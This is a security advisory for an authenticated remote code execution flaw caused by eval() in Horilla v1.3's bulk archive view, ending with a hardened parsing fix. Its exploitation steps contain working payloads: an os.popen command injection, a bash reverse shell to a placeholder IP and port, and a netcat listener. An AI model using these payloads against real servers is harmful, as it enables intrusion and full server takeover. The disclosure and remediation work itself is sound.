### Key Information

#### Vulnerability Overview

- **Vulnerability Type**: Authenticated Remote Code Execution (RCE)
- **Affected Version**: Horilla v1.3
- **Fixed Version**: 1.3.1
- **CVE ID**: CVE-2023-48988
- **Severity**: High (CVSS v3 Base Score: 7.2/10)

#### Vulnerability Details

- **Description**: In the `project_bulk_archive` view, the use of Python's `eval()` function on user-controlled query parameters leads to an authenticated remote code execution vulnerability.
- **Affected Code**:

  ```python
  is_active = eval(request.GET.get("is_active"))
  ```

- **Exploitation Conditions**:
  - Authenticated user with project archiving permissions (e.g., admin)
  - At least one project must be created
  - Code injection via the `is_active` query parameter
  - When `DEBUG=True`, Django returns detailed error messages, including the output of any evaluated expression
  - Even when `DEBUG=False`, exploitation is possible via blind payloads (e.g., reverse shell)

#### Exploitation Steps

- **With Debug Mode Enabled**:
  1. Create a project
  2. Trigger the bulk archive operation with a malicious request:

     ```http
     POST /project/bulk_archive?is_active=__import__('os').popen('id').read() HTTP/1.1
     Host: localhost:8000
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Referer: http://localhost:8000/project/project-view/
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     X-Requested-With: XMLHttpRequest
     Content-Length: 70
     Origin: http://localhost:8000
     DNT: 1
     Connection: keep-alive
     Cookie: sessionid=...
     Sec-Fetch-Dest: empty
     Sec-Fetch-Mode: cors
     Sec-Fetch-Site: same-origin
     Priority: u=8

     csrftoken=...
     ```

- **With Debug Mode Disabled**:
  1. Create a project
  2. Trigger the bulk archive operation with a malicious request:

     ```http
     POST /project/bulk_archive?is_active=__import__('os').system('-bash+-i+>+/dev/tcp/IP/PORT+0<&1')
     ```

  3. On the attacker's machine, run: `nc -lvp PORT`

#### Impact

- **Impact**: Full command execution, potentially leading to server compromise
- **Vulnerability Type**: Authenticated Remote Code Execution (RCE)
- **CWE ID**: CWE-95: Eval Injection
- **Severity**: High (requires authenticated access)
- **Exploitability**: High
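The root cause above is that `eval()` is used as a boolean parser. The following added example (not Horilla's code) puts the advisory's `eval()` pattern beside a strict allow-list parser that maps a handful of boolean tokens to `True`/`False` and rejects everything else; `GET` is a plain dict standing in for Django's `request.GET`, and `bulk_archive_view` is a constructed stand-in for the view.

```python
# Added example, not from the Horilla project: the eval()-based parsing the
# advisory describes (CWE-95) beside a hardened allow-list replacement.
# `GET` is a constructed stand-in for Django's request.GET (a dict suffices).

TRUE_TOKENS = {"true", "1", "yes", "on"}
FALSE_TOKENS = {"false", "0", "no", "off"}


def parse_is_active_unsafe(GET):
    """Mirrors the vulnerable pattern: eval() on a user-controlled value.

    Any Python expression in the query string is executed here, which is
    exactly the eval-injection the advisory reports.
    """
    return eval(GET.get("is_active"))


def parse_is_active(GET, default=None):
    """Hardened replacement: map an allow-list of strings to bool.

    Anything outside the allow-list raises ValueError so the view can answer
    with HTTP 400 instead of evaluating attacker-controlled text.
    """
    raw = GET.get("is_active")
    if raw is None:
        if default is None:
            raise ValueError("is_active is required")
        return default
    token = raw.strip().lower()
    if token in TRUE_TOKENS:
        return True
    if token in FALSE_TOKENS:
        return False
    raise ValueError(f"is_active must be a boolean token, got {raw!r}")


def bulk_archive_view(GET):
    """Constructed stand-in for the view: returns (http_status, result)."""
    try:
        is_active = parse_is_active(GET)
    except ValueError as exc:
        return 400, str(exc)
    return 200, is_active


if __name__ == "__main__":
    # eval() treats the parameter as an expression, not a boolean: "1+1" -> 2
    print(parse_is_active_unsafe({"is_active": "1+1"}))
    print(bulk_archive_view({"is_active": "true"}))   # (200, True)
    print(bulk_archive_view({"is_active": "1+1"}))    # (400, '...')
```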